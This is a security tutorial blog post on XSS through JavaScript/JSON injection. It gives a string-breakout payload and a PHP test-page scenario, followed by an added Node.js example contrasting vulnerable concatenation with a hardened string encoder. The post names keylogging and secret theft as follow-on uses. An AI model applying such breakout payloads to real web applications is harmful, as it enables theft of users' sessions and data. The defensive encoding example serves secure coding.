Day 33: XSS, JSON/JS Injection

So, you have found an app that echoes your input back into a JSON array or some JavaScript code, but it's not inside a function you can exploit. Who cares? Just write your own JavaScript.

Made a Simple Test Page

What does it do?

It takes the value of payload and logs it to the console along with the age.

Let’s look at the source…

PHP injects the request parameter into the page dynamically and then emits normal script output. This is very common in web apps: dynamically producing what ends up as static code.

What do we do next?

Well, as with overflows, we control what comes after our input, so all we have to do is supply valid code!

Payload…

james"; alert("Follow me on Twitter @int0x33"); var random = "

As you can see we had to finish off the first variable properly…

james";
produces…
var name = "james";

Then we can do whatever we want…

alert("Follow me on Twitter @int0x33");
  • Keylog
  • Steal Secrets
  • Browser Exploitation etc

Finally, close it off properly…

var random = "
produces…
var random = "";
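Rebuilt in Node.js as an added example (this is not the PHP test page from the post): the var name = "..." line rendered once with raw concatenation and once with proper encoding, then the post's payload run through both so you can watch one version execute the injected alert while the other keeps it as plain string data. The function names are made up for the example.

```javascript
// Added example, not code from the original post. It reconstructs the
// `var name = "..."` line: once built the vulnerable way (raw concatenation,
// as the PHP page does) and once with an encoder that keeps untrusted data
// inside a single string literal. The payload is the post's; the function
// names are constructed for illustration.

const PAYLOAD = 'james"; alert("Follow me on Twitter @int0x33"); var random = "';

// Vulnerable: the value is pasted straight into the literal, so the first
// double quote in it terminates the string and the rest becomes code.
function renderVulnerable(name) {
  return `var name = "${name}";`;
}

// Hardened: JSON.stringify emits a complete JS string literal (quotes and
// backslashes escaped). The extra replaces cover characters JSON leaves
// alone but that still matter inside a <script> block or a JS literal:
// '<' and '>' (so "</script>" can never appear), '&', and the U+2028/U+2029
// line terminators that are legal in JSON but not in older JS strings.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(name) {
  return `var name = ${jsStringLiteral(name)};`;
}

// Check: run the rendered line in a throwaway function scope with a stub
// alert() and report what actually executed. Both lines are valid JS; the
// question is whether the line holds one statement or three.
function execute(line) {
  const alerts = [];
  const fn = new Function('alert',
    line + '\nreturn { name: name, randomDefined: typeof random !== "undefined" };');
  const out = fn((msg) => alerts.push(msg));
  return { ...out, alerts };
}

console.log(execute(renderVulnerable(PAYLOAD))); // alert fired, random defined
console.log(execute(renderSafe(PAYLOAD)));       // name === PAYLOAD, nothing else ran
```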

Now, go forth and exploit injectable static code, JavaScript and JSON blobs! Woop woop.

I will do a few posts on advanced XSS exploitation in the coming weeks that will help you get past filters, do more with XSS and generally take XSS exploitation to the next level.